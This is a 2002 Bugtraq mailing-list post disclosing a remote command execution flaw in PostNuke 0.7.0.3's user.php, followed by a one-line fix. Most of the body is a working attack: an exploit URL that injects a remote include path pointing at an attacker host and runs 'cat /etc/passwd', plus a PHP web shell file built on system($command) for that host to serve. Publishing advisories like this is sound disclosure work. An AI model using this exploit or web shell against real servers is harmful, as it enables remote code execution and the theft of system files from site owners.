Home page logo
/

bugtraq logo Bugtraq mailing list archives

postnuke v 0.7.0.3 remote command execution
From: pokleyzz sakamaniaka <pokleyzz () hotmail com>
Date: 28 Mar 2002 01:03:21 -0000



post nuke is one of popular content management 
system written in php . there are bug in file user.php 
line 107
which user can append $caselist array with their own 
value.

foreach ($caselist as $k=>$v)
{
    $ModName = $v['module'];
    include "$v[path]/$k";
}
$caselist = array();

http://lame_host/user.php?caselist[bad_file.txt][path]
=http://bad_host&command=cat%20/etc/passwd

bad_file.txt (put in bad_host document root):

-- start bad_file.txt -----
<pre>
<?php 
system($command);
?>
-- end bad_file.txt -----

quick fix: 
put on line 28 :
$caselist = array();

http://inetd-secure.net/
http://www.mybsd.org.my/pokleyzz/


  By Date           By Thread  

Current thread:
  • postnuke v 0.7.0.3 remote command execution pokleyzz sakamaniaka (Mar 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]